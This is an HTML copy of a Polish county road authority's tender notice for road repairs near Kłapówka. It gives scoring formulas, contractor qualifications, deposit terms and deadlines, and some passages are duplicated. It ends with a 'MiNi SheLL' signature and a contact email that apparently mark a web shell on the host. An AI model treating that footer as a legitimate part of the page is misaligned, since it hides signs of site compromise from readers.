poszczególnych ofert w kryterium gwarancja jakości<br/>stosując poniższy wzór:<br/><br/>długość gwarancji w ofercie badanej<br/>ilość punktów G = -------------------------------------------------- x 40 pkt<br/>maksymalna długość gwarancji (60 m-cy)<br/><br/>Uwaga punktacja liczona oddzielnie dla każdej części<br/><br/>2. Łączna liczba uzyskanych punktów:<br/>X = C + G<br/>gdzie:<br/>X – łączna liczba uzyskanych punktów przez ofertę<br/>C – ilość punktów jakie otrzyma oferta za kryterium „Cena”<br/>G – ilość punktów jakie otrzyma oferta za kryterium „Gwarancja jakości”<br/>Maksymalna ilość punktów do uzyskania przez Wykonawcę wynosi 100.<br/>Uwaga punktacja liczona oddzielnie dla każdej części 3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona oddzielnie dla każdej części z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>6. Zamawiający poprawia w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, − niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona oddzielnie dla każdej części z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>6. Zamawiający poprawia w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, − niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Przebudowa i remont wybranych dróg powiatowych na terenie Powiatu Kolbuszowskiego.<br/><br/>Zamówienie podzielone zostało na części:<br/>Część nr 2 <br/><br/>Remont drogi powiatowej nr 1215R relacji Werynia – Kłapówka na odcinku od km 3+437 do km 4+676 oraz drogi powiatowej nr 1212R relacji Lipnica – Dzikowiec – Widełka na odcinku od km 7+387 do km 8+241 w miejscowości Kłapówka<br/><br/>	Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. - na przełomach; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie warstwy podbudowy z kruszywa łamanego stab. mechanicznie 0/31,5mm gr. 20 cm; Wykonanie warstwy mrozoochronnej <br/>z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0MPa gr. 15 cm; Wykonanie nawierzchni poboczy z kruszywa łamanego 0/31,5mm o gr. 10 cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp <br/>gr. 10 cm.<br/><br/>Zakres robót zgodnie z kosztorysem ofertowym, dokumentacją projektową stanowiącą złącznik do SWZ oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert I ich wagami (1% = 1 pkt):<br/>1) Cena I – 60 pkt,<br/>• Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>• Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>• Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg wzoru:<br/><br/>cena najniższa brutto*<br/>ilość punktów C = ------------------------------------------------ x 60 pkt<br/>cena oferty ocenianej brutto<br/><br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Uwaga punktacja liczona oddzielnie dla każdej części<br/><br/>2) Gwarancja jakości (G) – 40 pkt,<br/>• Punkty za kryterium gwarancja jakości zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego okresu udzielonej gwarancji jakości zawartego w formularzu oferty. Komisja dokona oceny poszczególnych ofert w kryterium gwarancja jakości<br/>stosując poniższy wzór:<br/><br/>długość gwarancji w ofercie badanej<br/>ilość punktów G = -------------------------------------------------- x 40 pkt<br/>maksymalna długość gwarancji (60 m-cy)<br/><br/>Uwaga punktacja liczona oddzielnie dla każdej części<br/><br/>2. Łączna liczba uzyskanych punktów:<br/>X = C + G<br/>gdzie:<br/>X – łączna liczba uzyskanych punktów przez ofertę<br/>C – ilość punktów jakie otrzyma oferta za kryterium „Cena”<br/>G – ilość punktów jakie otrzyma oferta za kryterium „Gwarancja jakości”<br/>Maksymalna ilość punktów do uzyskania przez Wykonawcę wynosi 100.<br/>Uwaga punktacja liczona oddzielnie dla każdej części 3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona oddzielnie dla każdej części z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>6. Zamawiający poprawia w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, − niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona oddzielnie dla każdej części z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>6. Zamawiający poprawia w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, − niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że<br/>a) Kadra<br/>• dysponuje co najmniej 1 (jedną) osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności drogowej<br/>Uwagi:<br/>- Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem.<br/>- W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych.<br/>- Osoba ta musi posiadać aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego oraz uprawnienia budowlane wymagane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) i – jeżeli jest to wymagane– ubezpieczenia od odpowiedzialności cywilnej.<br/>- Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/><br/>b) Doświadczenie<br/>• w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wykonał należycie co najmniej 2 roboty budowlane (w ramach jednej umowy/kontraktu/zlecenia) polegająca na<br/>budowie, przebudowie lub rozbudowie drogi klasy Z o wartości minimum 500 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>Załącznik nr 7 do SWZ;<br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 3 do SWZ;<br/>4) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia I wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 4 do SWZ;<br/>5) oświadczenia na temat wykształcenia I kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej wykonawcy – Załącznik nr 4 do SWZ;<br/>6) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p. w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 p.z.p. oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 4 p.z.p. – wzór oświadczenia stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 oraz 2a do SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu I tymczasowo zastępuje wymagane podmiotowe środki dowodowe.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3) dowód wniesienia wadium;<br/>4) dokumenty, z których wynika prawo do podpisania oferty;<br/>5) odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/>6) kosztorysy ofertowe <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium oddzielnie dla każdej części w wysokości:<br/><br/>Część 1: 46 000,00 zł (słownie: czterdzieści sześć tysięcy złotych 00/100)<br/>Część 2: 9 000,00 zł (słownie: dziewięć tysięcy złotych 00/100)<br/><br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>Wadium w formie pieniądza należy wnieść przelewem na konto: Bank Pekao S.A.<br/>Departament Klientów Strategicznych Biuro Średnich Jednostek Sektora Publicznego <br/>al. Ł. Cieplińskiego 1, 35-959 Rzeszów<br/>Nr konta bankowego: 06 1240 1792 1111 0010 8532 1297 <br/>z dopiskiem „Wadium – nazwa lub nr postępowania oraz podć nri nazwę częsci”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego, termin zaksięgowania środków pieniężnych na rachunku Zamawiającego.<br/>Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>5)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.<br/>6)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>7)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>8)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>9)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>10)	beneficjentem poręczenia lub gwarancji jest: Zarząd Dróg Powiatowych <br/>w Kolbuszowej;<br/>11)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art.58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>4.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>5.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_kolbuszowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com